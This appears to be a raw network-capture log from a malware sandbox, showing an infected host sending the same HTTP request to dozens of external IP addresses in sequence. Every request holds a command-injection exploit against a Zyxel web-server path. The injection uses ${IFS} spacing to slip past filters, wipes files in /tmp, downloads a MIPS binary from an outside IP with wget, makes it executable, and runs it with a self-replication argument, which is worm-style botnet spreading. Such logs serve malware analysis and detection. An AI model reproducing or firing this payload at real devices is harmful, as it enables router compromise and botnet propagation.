                                                      Feb 2, 2024 06:35:46.490590096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2776192.168.2.14580609.238.110.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490626097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2777192.168.2.145726499.46.104.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490667105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2778192.168.2.1457454159.144.79.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490693092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2779192.168.2.145777417.77.246.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490756035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2780192.168.2.1459718169.210.187.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490803003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2781192.168.2.144005273.5.179.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490850925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2782192.168.2.1451454206.245.143.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490871906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2783192.168.2.1453206115.120.195.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490917921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2784192.168.2.143860249.143.174.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490953922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2785192.168.2.144181657.236.247.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491007090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2786192.168.2.1455898154.17.231.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491051912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2787192.168.2.1439582122.126.182.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491092920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2788192.168.2.145591813.100.211.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491142035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2789192.168.2.1437310206.86.186.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491193056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2790192.168.2.1454948128.211.104.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491220951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2791192.168.2.1452142156.34.217.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491250038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2792192.168.2.144144418.112.177.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491302013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2793192.168.2.144490490.170.99.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491365910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2794192.168.2.1446052161.230.171.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491388083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2795192.168.2.1433382194.184.204.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491427898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2796192.168.2.14489449.5.172.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491461039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2797192.168.2.1451092152.250.157.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491483927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2798192.168.2.144587658.52.169.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491530895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2799192.168.2.1446582193.246.55.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491575956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2800192.168.2.1435034150.189.219.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491620064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2801192.168.2.1450526173.218.79.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491662025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2802192.168.2.1451382156.123.158.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491692066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2803192.168.2.1446358145.160.13.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491733074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2804192.168.2.1441842152.225.214.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491763115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2805192.168.2.1433904146.9.172.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491810083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2806192.168.2.144837276.9.101.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491842031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2807192.168.2.144203474.43.198.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491894007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2808192.168.2.145700432.179.136.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491923094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2809192.168.2.1435050193.20.26.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.491976023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2810192.168.2.1450400222.99.136.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492013931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2811192.168.2.145687492.45.172.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492046118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2812192.168.2.1459148198.30.126.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492089987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2813192.168.2.1460940144.113.255.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492132902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2814192.168.2.1458464197.249.51.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492163897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2815192.168.2.143966286.251.187.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492202044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2816192.168.2.143520638.203.139.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492249012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2817192.168.2.1458106103.232.87.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492285013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2818192.168.2.1456812157.242.122.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492322922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2819192.168.2.145096823.76.219.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492352009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2820192.168.2.1459764116.108.205.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492396116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2821192.168.2.1445640117.85.162.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492451906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2822192.168.2.1443934101.91.58.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492477894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2823192.168.2.143527852.226.107.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492548943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2824192.168.2.14496782.103.241.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492579937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2825192.168.2.1453596216.209.37.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492604971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2826192.168.2.145335295.190.28.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492677927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2827192.168.2.1438176205.226.22.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492705107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2828192.168.2.144715825.125.4.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492747068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2829192.168.2.1444710100.176.77.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492790937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2830192.168.2.14599661.251.186.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492835999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2831192.168.2.145829497.52.154.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492872000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2832192.168.2.145877283.181.52.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492917061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2833192.168.2.1452078179.29.92.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492954969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2834192.168.2.143855676.143.191.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.492991924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2835192.168.2.1440520144.161.73.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493037939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2836192.168.2.1438516133.189.245.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493079901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2837192.168.2.1457270204.110.155.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493120909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2838192.168.2.1445788123.78.48.135443
                                                      TimestampBytes transferredDirectionData
